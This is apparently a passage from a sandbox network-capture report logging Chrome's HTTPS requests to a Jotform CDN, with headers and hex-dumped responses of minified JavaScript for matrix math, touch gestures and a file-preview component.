                                                                                                                                                                                                                                            Data Ascii: m24=c,t.m34=v,t.m44=b}else{if(6!==r.length)throw new TypeError("CSSMatrix: expecting an Array of 6/16 values.");var _=r[0],w=r[1],S=r[2],k=r[3],A=r[4],x=r[5];t.m11=_,t.a=_,t.m12=w,t.b=w,t.m21=S,t.c=S,t.m22=k,t.d=k,t.m41=A,t.e=A,t.m42=x,t.f=x}return t}func
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 2b 65 29 7d 29 29 29 6e 3d 6e 2e 74 72 61 6e 73 6c 61 74 65 28 6c 2c 75 2c 63 29 3b 65 6c 73 65 20 69 66 28 22 74 72 61 6e 73 6c 61 74 65 22 3d 3d 3d 69 26 26 6c 26 26 76 6f 69 64 20 30 3d 3d 3d 63 29 6e 3d 6e 2e 74 72 61 6e 73 6c 61 74 65 28 6c 2c 75 7c 7c 30 2c 30 29 3b 65 6c 73 65 20 69 66 28 22 72 6f 74 61 74 65 33 64 22 3d 3d 3d 69 26 26 68 2e 65 76 65 72 79 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 2b 65 29 7d 29 29 26 26 66 29 6e 3d 6e 2e 72 6f 74 61 74 65 41 78 69 73 41 6e 67 6c 65 28 6c 2c 75 2c 63 2c 66 29 3b 65 6c 73 65 20 69 66 28 22 72 6f 74 61 74 65 22 3d 3d 3d 69 26 26 6c 26 26 5b 75 2c 63 5d 2e 65 76 65 72 79 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 76 6f 69
                                                                                                                                                                                                                                            Data Ascii: +e)})))n=n.translate(l,u,c);else if("translate"===i&&l&&void 0===c)n=n.translate(l,u||0,0);else if("rotate3d"===i&&h.every((function(e){return!Number.isNaN(+e)}))&&f)n=n.rotateAxisAngle(l,u,c,f);else if("rotate"===i&&l&&[u,c].every((function(e){return voi
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 3d 79 2c 6e 2e 6d 31 33 3d 66 3b 76 61 72 20 6d 3d 75 2a 66 2a 68 2b 6c 2a 70 3b 6e 2e 6d 32 31 3d 6d 2c 6e 2e 63 3d 6d 3b 76 61 72 20 67 3d 6c 2a 68 2d 75 2a 66 2a 70 3b 72 65 74 75 72 6e 20 6e 2e 6d 32 32 3d 67 2c 6e 2e 64 3d 67 2c 6e 2e 6d 32 33 3d 2d 75 2a 63 2c 6e 2e 6d 33 31 3d 75 2a 70 2d 6c 2a 66 2a 68 2c 6e 2e 6d 33 32 3d 75 2a 68 2b 6c 2a 66 2a 70 2c 6e 2e 6d 33 33 3d 6c 2a 63 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 2c 72 2c 6e 29 7b 76 61 72 20 61 3d 6e 65 77 20 64 2c 69 3d 4d 61 74 68 2e 73 71 72 74 28 65 2a 65 2b 74 2a 74 2b 72 2a 72 29 3b 69 66 28 30 3d 3d 3d 69 29 72 65 74 75 72 6e 20 61 3b 76 61 72 20 6f 3d 65 2f 69 2c 73 3d 74 2f 69 2c 6c 3d 72 2f 69 2c 75 3d 6e 2a 28 4d 61 74 68 2e 50 49 2f 33 36 30 29 2c 63 3d 4d 61 74 68 2e
                                                                                                                                                                                                                                            Data Ascii: =y,n.m13=f;var m=u*f*h+l*p;n.m21=m,n.c=m;var g=l*h-u*f*p;return n.m22=g,n.d=g,n.m23=-u*c,n.m31=u*p-l*f*h,n.m32=u*h+l*f*p,n.m33=l*c,n}function o(e,t,r,n){var a=new d,i=Math.sqrt(e*e+t*t+r*r);if(0===i)return a;var o=e/i,s=t/i,l=r/i,u=n*(Math.PI/360),c=Math.
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 34 2a 74 2e 6d 34 33 2c 72 2e 6d 33 31 2a 74 2e 6d 31 34 2b 72 2e 6d 33 32 2a 74 2e 6d 32 34 2b 72 2e 6d 33 33 2a 74 2e 6d 33 34 2b 72 2e 6d 33 34 2a 74 2e 6d 34 34 2c 72 2e 6d 34 31 2a 74 2e 6d 31 31 2b 72 2e 6d 34 32 2a 74 2e 6d 32 31 2b 72 2e 6d 34 33 2a 74 2e 6d 33 31 2b 72 2e 6d 34 34 2a 74 2e 6d 34 31 2c 72 2e 6d 34 31 2a 74 2e 6d 31 32 2b 72 2e 6d 34 32 2a 74 2e 6d 32 32 2b 72 2e 6d 34 33 2a 74 2e 6d 33 32 2b 72 2e 6d 34 34 2a 74 2e 6d 34 32 2c 72 2e 6d 34 31 2a 74 2e 6d 31 33 2b 72 2e 6d 34 32 2a 74 2e 6d 32 33 2b 72 2e 6d 34 33 2a 74 2e 6d 33 33 2b 72 2e 6d 34 34 2a 74 2e 6d 34 33 2c 72 2e 6d 34 31 2a 74 2e 6d 31 34 2b 72 2e 6d 34 32 2a 74 2e 6d 32 34 2b 72 2e 6d 34 33 2a 74 2e 6d 33 34 2b 72 2e 6d 34 34 2a 74 2e 6d 34 34 5d 29 7d 76 61 72 20 64
                                                                                                                                                                                                                                            Data Ascii: 4*t.m43,r.m31*t.m14+r.m32*t.m24+r.m33*t.m34+r.m34*t.m44,r.m41*t.m11+r.m42*t.m21+r.m43*t.m31+r.m44*t.m41,r.m41*t.m12+r.m42*t.m22+r.m43*t.m32+r.m44*t.m42,r.m41*t.m13+r.m42*t.m23+r.m43*t.m33+r.m44*t.m43,r.m41*t.m14+r.m42*t.m24+r.m43*t.m34+r.m44*t.m44])}var d
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 20 46 6c 6f 61 74 36 34 41 72 72 61 79 2e 66 72 6f 6d 28 6e 28 74 68 69 73 2c 65 29 29 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 65 2e 69 73 32 44 3b 72 65 74 75 72 6e 28 74 3f 22 6d 61 74 72 69 78 22 3a 22 6d 61 74 72 69 78 33 64 22 29 2b 22 28 22 2b 65 2e 74 6f 46 6c 6f 61 74 36 34 41 72 72 61 79 28 74 29 2e 6a 6f 69 6e 28 22 2c 20 22 29 2b 22 29 22 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 65 2e 69 73 32 44 2c 72 3d 65 2e 69 73 49 64 65 6e 74 69 74 79 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 65 2c 7b 69 73 32 44 3a 74 2c 69 73 49
                                                                                                                                                                                                                                            Data Ascii: Float64Array.from(n(this,e))},d.prototype.toString=function(){var e=this,t=e.is2D;return(t?"matrix":"matrix3d")+"("+e.toFloat64Array(t).join(", ")+")"},d.prototype.toJSON=function(){var e=this,t=e.is2D,r=e.isIdentity;return Object.assign({},e,{is2D:t,isI
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 3a 61 2c 52 6f 74 61 74 65 3a 69 2c 52 6f 74 61 74 65 41 78 69 73 41 6e 67 6c 65 3a 6f 2c 53 63 61 6c 65 3a 73 2c 53 6b 65 77 58 3a 75 2c 53 6b 65 77 59 3a 63 2c 53 6b 65 77 3a 6c 2c 4d 75 6c 74 69 70 6c 79 3a 66 2c 66 72 6f 6d 41 72 72 61 79 3a 65 2c 66 72 6f 6d 4d 61 74 72 69 78 3a 74 2c 66 72 6f 6d 53 74 72 69 6e 67 3a 72 2c 74 6f 41 72 72 61 79 3a 6e 7d 29 3b 76 61 72 20 70 3d 22 31 2e 30 2e 33 22 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 64 2c 7b 56 65 72 73 69 6f 6e 3a 70 7d 29 2c 64 7d 28 29 7d 2c 39 36 37 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 21 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 2c 6f 3d 5b 22 22 2c 22 77 65 62 6b 69 74 22 2c 22 4d 6f 7a 22 2c
                                                                                                                                                                                                                                            Data Ascii: :a,Rotate:i,RotateAxisAngle:o,Scale:s,SkewX:u,SkewY:c,Skew:l,Multiply:f,fromArray:e,fromMatrix:t,fromString:r,toArray:n});var p="1.0.3";return Object.assign(d,{Version:p}),d}()},96724:function(e){!function(t,r,n,a){"use strict";var i,o=["","webkit","Moz",
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 5b 69 5d 5d 3d 74 5b 6e 5b 69 5d 5d 29 2c 69 2b 2b 3b 72 65 74 75 72 6e 20 65 7d 29 2c 22 65 78 74 65 6e 64 22 2c 22 55 73 65 20 60 61 73 73 69 67 6e 60 2e 22 29 2c 79 3d 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 76 28 65 2c 74 2c 21 30 29 7d 29 2c 22 6d 65 72 67 65 22 2c 22 55 73 65 20 60 61 73 73 69 67 6e 60 2e 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 2c 61 3d 74 2e 70 72 6f 74 6f 74 79 70 65 3b 28 6e 3d 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 61 29 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 65 2c 6e 2e 5f 73 75 70 65 72 3d 61 2c 72 26 26 69 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 67 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                            Data Ascii: [i]]=t[n[i]]),i++;return e}),"extend","Use `assign`."),y=p((function(e,t){return v(e,t,!0)}),"merge","Use `assign`.");function m(e,t,r){var n,a=t.prototype;(n=e.prototype=Object.create(a)).constructor=e,n._super=a,r&&i(n,r)}function g(e,t){return function
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 74 29 2c 49 3d 22 74 6f 75 63 68 22 2c 6a 3d 22 6d 6f 75 73 65 22 2c 4c 3d 32 34 2c 4e 3d 5b 22 78 22 2c 22 79 22 5d 2c 42 3d 5b 22 63 6c 69 65 6e 74 58 22 2c 22 63 6c 69 65 6e 74 59 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 55 28 65 2c 74 29 7b 76 61 72 20 72 3d 74 68 69 73 3b 74 68 69 73 2e 6d 61 6e 61 67 65 72 3d 65 2c 74 68 69 73 2e 63 61 6c 6c 62 61 63 6b 3d 74 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 3d 65 2e 65 6c 65 6d 65 6e 74 2c 74 68 69 73 2e 74 61 72 67 65 74 3d 65 2e 6f 70 74 69 6f 6e 73 2e 69 6e 70 75 74 54 61 72 67 65 74 2c 74 68 69 73 2e 64 6f 6d 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 62 28 65 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 2c 5b 65 5d 29 26 26 72 2e 68 61 6e 64 6c 65 72 28 74 29 7d 2c 74 68 69 73 2e 69 6e 69 74
                                                                                                                                                                                                                                            Data Ascii: t),I="touch",j="mouse",L=24,N=["x","y"],B=["clientX","clientY"];function U(e,t){var r=this;this.manager=e,this.callback=t,this.element=e.element,this.target=e.options.inputTarget,this.domHandler=function(t){b(e.options.enable,[e])&&r.handler(t)},this.init
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 6e 67 74 68 3a 72 2e 70 72 65 76 49 6e 70 75 74 2e 6d 61 78 50 6f 69 6e 74 65 72 73 3a 74 2e 70 6f 69 6e 74 65 72 73 2e 6c 65 6e 67 74 68 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 2c 6e 2c 69 2c 6f 2c 73 3d 65 2e 6c 61 73 74 49 6e 74 65 72 76 61 6c 7c 7c 74 2c 6c 3d 74 2e 74 69 6d 65 53 74 61 6d 70 2d 73 2e 74 69 6d 65 53 74 61 6d 70 3b 69 66 28 38 21 3d 74 2e 65 76 65 6e 74 54 79 70 65 26 26 28 6c 3e 32 35 7c 7c 73 2e 76 65 6c 6f 63 69 74 79 3d 3d 3d 61 29 29 7b 76 61 72 20 63 3d 74 2e 64 65 6c 74 61 58 2d 73 2e 64 65 6c 74 61 58 2c 66 3d 74 2e 64 65 6c 74 61 59 2d 73 2e 64 65 6c 74 61 59 2c 64 3d 47 28 6c 2c 63 2c 66 29 3b 6e 3d 64 2e 78 2c 69 3d 64 2e 79 2c 72 3d 75 28 64 2e 78 29 3e 75 28 64 2e 79 29 3f 64 2e 78 3a 64 2e 79 2c 6f 3d
                                                                                                                                                                                                                                            Data Ascii: ngth:r.prevInput.maxPointers:t.pointers.length,function(e,t){var r,n,i,o,s=e.lastInterval||t,l=t.timeStamp-s.timeStamp;if(8!=t.eventType&&(l>25||s.velocity===a)){var c=t.deltaX-s.deltaX,f=t.deltaY-s.deltaY,d=G(l,c,f);n=d.x,i=d.y,r=u(d.x)>u(d.y)?d.x:d.y,o=


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            96192.168.2.1749810104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC571OUTGET /s/portal/674ac14411e/static/js/DocumentPreview.af8c5c66.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC426INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:20 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 30019
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:26:55 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "47729a5b4d98f8419dce0e722efba3cb"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb64ecb0f437e-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC943INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 61 62 31 36 36 38 33 35 2d 35 65 65 33 2d 35 30 65 32 2d 39 33 33 32 2d 35 30 38 65 38 38
                                                                                                                                                                                                                                            Data Ascii: "use strict";!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ab166835-5ee3-50e2-9332-508e88
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 62 6a 65 63 74 2e 61 73 73 69 67 6e 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 5b 69 5d 3b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 6e 29 28 7b 7d 29 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 74 29 26 26 28 65 5b 74 5d 3d 6e 5b 74 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 4e 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 63 6f 6e 73 74 20 49 3d 65 3d 3e 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 4e 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 66 69 6c 6c 3a
                                                                                                                                                                                                                                            Data Ascii: bject.assign.bind():function(e){for(var i=1;i<arguments.length;i++){var n=arguments[i];for(var t in n)({}).hasOwnProperty.call(n,t)&&(e[t]=n[t])}return e},N.apply(null,arguments)}const I=e=>r.createElement("svg",N({xmlns:"http://www.w3.org/2000/svg",fill:
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 4f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 2d 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3e 38 34 30 3f 32 36 30 3a 32 30 29 2c 53 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 2d 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3e 38 34 30 3f 38 30 3a 31 30 29 2c 7a 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 2c 74 68 69 73 2e 69 6d 61 67 65 2e 63 75 72 72 65 6e 74 26 26 28 74 68 69 73 2e 68 61 6d 6d 65 72 3d 6d 28 29 28 74 68 69 73 2e 69 6d 61 67 65 2e 63 75 72 72 65 6e 74 29 2c 74 68 69 73 2e 68 61 6d 6d 65 72 2e 6f 6e 28 22 74 61 70 22 2c 74 68 69 73 2e 68 61 6e 64 6c 65 44 6f 75 62 6c 65 54 61 70 29 29 7d 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 55 6e 6d 6f 75 6e 74 28 29 7b 74 68 69 73 2e 68 61 6d 6d
                                                                                                                                                                                                                                            Data Ascii: O=window.innerHeight-(window.innerWidth>840?260:20),S=window.innerWidth-(window.innerWidth>840?80:10),z=window.innerWidth,this.image.current&&(this.hammer=m()(this.image.current),this.hammer.on("tap",this.handleDoubleTap))}componentWillUnmount(){this.hamm
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 65 74 20 73 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 31 30 30 2a 65 2f 69 29 2c 72 3d 21 31 3b 69 66 28 74 3e 4f 7c 7c 6f 3e 53 29 7b 72 3d 21 30 3b 63 6f 6e 73 74 20 69 3d 4f 2f 6e 2c 74 3d 53 2f 65 3b 73 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 31 30 30 2a 4d 61 74 68 2e 6d 69 6e 28 69 2c 74 29 29 7d 72 3f 74 68 69 73 2e 73 65 74 53 74 61 74 65 28 7b 70 65 72 63 65 6e 74 61 67 65 3a 73 7d 2c 28 28 29 3d 3e 74 68 69 73 2e 68 61 6e 64 6c 65 5a 6f 6f 6d 28 22 6f 75 74 22 2c 21 30 29 29 29 3a 74 68 69 73 2e 73 65 74 53 74 61 74 65 28 7b 70 65 72 63 65 6e 74 61 67 65 3a 73 2c 72 65 6e 64 65 72 3a 21 30 2c 69 6d 61 67 65 53 74 79 6c 65 3a 7b 6d 61 78 57 69 64 74 68 3a 22 6e 6f 6e 65 22 2c 6d 61 78 48 65 69 67 68 74 3a 22 6e 6f 6e 65 22 2c 77 69 64 74 68 3a 60 24 7b 65
                                                                                                                                                                                                                                            Data Ascii: et s=Math.floor(100*e/i),r=!1;if(t>O||o>S){r=!0;const i=O/n,t=S/e;s=Math.floor(100*Math.min(i,t))}r?this.setState({percentage:s},(()=>this.handleZoom("out",!0))):this.setState({percentage:s,render:!0,imageStyle:{maxWidth:"none",maxHeight:"none",width:`${e
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 72 48 65 69 67 68 74 2d 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3e 38 34 30 3f 32 36 30 3a 32 30 29 2c 41 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 2d 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3e 38 34 30 3f 38 30 3a 31 30 29 3b 63 6c 61 73 73 20 24 20 65 78 74 65 6e 64 73 20 72 2e 50 75 72 65 43 6f 6d 70 6f 6e 65 6e 74 7b 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 4d 6f 75 6e 74 28 29 7b 63 6f 6e 73 74 7b 66 69 6c 65 3a 65 7d 3d 74 68 69 73 2e 70 72 6f 70 73 2c 69 3d 6e 65 77 20 6e 2e 67 2e 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 69 2e 6f 70 65 6e 28 22 47 45 54 22 2c 65 2e 70 72 65 76 69 65 77 55 72 6c 29 2c 69 2e 72 65 73 70 6f 6e 73 65 54 79 70 65 3d 22 61 72 72 61 79 62 75 66 66 65 72 22 2c 69 2e 6f 6e 6c 6f 61 64
                                                                                                                                                                                                                                            Data Ascii: rHeight-(window.innerWidth>840?260:20),A=window.innerWidth-(window.innerWidth>840?80:10);class $ extends r.PureComponent{componentDidMount(){const{file:e}=this.props,i=new n.g.XMLHttpRequest;i.open("GET",e.previewUrl),i.responseType="arraybuffer",i.onload
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 6e 5b 74 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 5f 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 63 6f 6e 73 74 20 71 3d 65 3d 3e 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 5f 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 7d 2c 65 29 2c 45 7c 7c 28 45 3d 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 33 20 32 30 56 34 61 33 20 33 20 30 20 30 20 31 20 33 2d 33 68 37 2e 37 35 36 61 32 20 32 20 30 20 30 20 31 20 31 2e 34 32 35 2e 35 39 36 6c
                                                                                                                                                                                                                                            Data Ascii: n[t])}return e},_.apply(null,arguments)}const q=e=>r.createElement("svg",_({xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},e),E||(E=r.createElement("path",{fillRule:"evenodd",d:"M3 20V4a3 3 0 0 1 3-3h7.756a2 2 0 0 1 1.425.596l
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 66 69 6c 65 43 6c 61 73 73 3a 22 66 6f 72 46 69 6c 65 55 70 6c 6f 61 64 49 6d 61 67 65 22 2c 77 72 61 70 70 65 72 43 6c 61 73 73 4e 61 6d 65 3a 22 70 72 65 76 69 65 77 2d 79 65 6c 6c 6f 77 2d 36 30 30 22 7d 2c 54 49 46 3a 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 54 69 66 66 22 2c 66 69 6c 65 43 6c 61 73 73 3a 22 66 6f 72 46 69 6c 65 55 70 6c 6f 61 64 49 6d 61 67 65 22 2c 77 72 61 70 70 65 72 43 6c 61 73 73 4e 61 6d 65 3a 22 70 72 65 76 69 65 77 2d 79 65 6c 6c 6f 77 2d 36 30 30 22 7d 2c 4d 50 33 3a 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 41 75 64 69 6f 22 2c 74 79 70 65 3a 22 61 75 64 69 6f 2f 6d 70 65 67 22 2c 66 69 6c 65 43 6c 61 73 73 3a 22 66 6f 72 46 69 6c 65 55 70 6c 6f 61 64 41 75 64 69 6f 22 2c 77 72 61 70 70 65 72 43 6c 61 73 73 4e 61 6d 65 3a 22 70 72 65
                                                                                                                                                                                                                                            Data Ascii: fileClass:"forFileUploadImage",wrapperClassName:"preview-yellow-600"},TIF:{component:"Tiff",fileClass:"forFileUploadImage",wrapperClassName:"preview-yellow-600"},MP3:{component:"Audio",type:"audio/mpeg",fileClass:"forFileUploadAudio",wrapperClassName:"pre
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 70 70 65 72 43 6c 61 73 73 4e 61 6d 65 3a 22 70 72 65 76 69 65 77 2d 62 6c 75 65 2d 35 30 30 22 7d 2c 58 4c 53 3a 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 55 6e 73 75 70 70 6f 72 74 65 64 22 2c 66 69 6c 65 43 6c 61 73 73 3a 22 66 6f 72 46 69 6c 65 55 70 6c 6f 61 64 44 6f 63 75 6d 65 6e 74 22 2c 77 72 61 70 70 65 72 43 6c 61 73 73 4e 61 6d 65 3a 22 70 72 65 76 69 65 77 2d 62 6c 75 65 2d 35 30 30 22 7d 2c 58 4c 53 58 3a 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 55 6e 73 75 70 70 6f 72 74 65 64 22 2c 66 69 6c 65 43 6c 61 73 73 3a 22 66 6f 72 46 69 6c 65 55 70 6c 6f 61 64 44 6f 63 75 6d 65 6e 74 22 2c 77 72 61 70 70 65 72 43 6c 61 73 73 4e 61 6d 65 3a 22 70 72 65 76 69 65 77 2d 62 6c 75 65 2d 35 30 30 22 7d 2c 43 53 56 3a 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 55 6e 73 75
                                                                                                                                                                                                                                            Data Ascii: pperClassName:"preview-blue-500"},XLS:{component:"Unsupported",fileClass:"forFileUploadDocument",wrapperClassName:"preview-blue-500"},XLSX:{component:"Unsupported",fileClass:"forFileUploadDocument",wrapperClassName:"preview-blue-500"},CSV:{component:"Unsu
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 7b 65 78 74 65 6e 73 69 6f 6e 3a 65 2c 69 73 50 72 65 76 69 65 77 3a 69 7d 29 3d 3e 7b 63 6f 6e 73 74 7b 69 63 6f 6e 54 79 70 65 3a 6e 2c 66 69 6c 65 43 6c 61 73 73 3a 74 3d 22 22 2c 77 72 61 70 70 65 72 43 6c 61 73 73 4e 61 6d 65 3a 6f 7d 3d 47 5b 65 5d 7c 7c 47 2e 55 6e 73 75 70 70 6f 72 74 65 64 2c 72 3d 28 30 2c 73 2e 6a 73 78 29 28 57 2e 5a 2c 7b 7d 29 2c 6c 3d 28 30 2c 73 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 60 66 69 6c 65 50 72 65 76 69 65 77 48 6f 6c 64 65 72 20 24 7b 74 7d 20 24 7b 6f 7d 60 2c 63 68 69 6c 64 72 65 6e 3a 5b 6e 7c 7c 72 2c 65 26 26 21 6e 26 26 28 30 2c 73 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 69 6c 65 54 79 70 65 22 2c 63 68 69 6c 64 72 65 6e 3a 65 7d 29 5d
